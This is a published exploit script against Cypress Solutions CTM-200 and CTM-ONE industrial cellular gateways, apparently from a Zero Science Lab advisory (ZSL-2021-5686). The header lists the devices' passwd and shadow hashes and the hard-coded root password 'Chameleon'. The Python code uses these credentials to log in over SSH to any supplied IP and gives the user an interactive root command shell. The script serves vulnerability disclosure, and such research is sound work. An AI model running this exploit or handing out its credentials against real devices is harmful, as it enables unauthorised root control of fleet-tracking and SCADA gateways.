Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)

# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
# 
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr='''
o ┌─┐┌┬┐┌─┐  ┌─┐  ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬  ┬   o
  │ │││││ ┬  ├─┤  ├┬┘│ ││ │ │ └─┐├─┤├┤ │  │
o └─┘┴ ┴└─┘  ┴ ┴  ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)

if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()

adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##

rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)

while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))
rsh.close()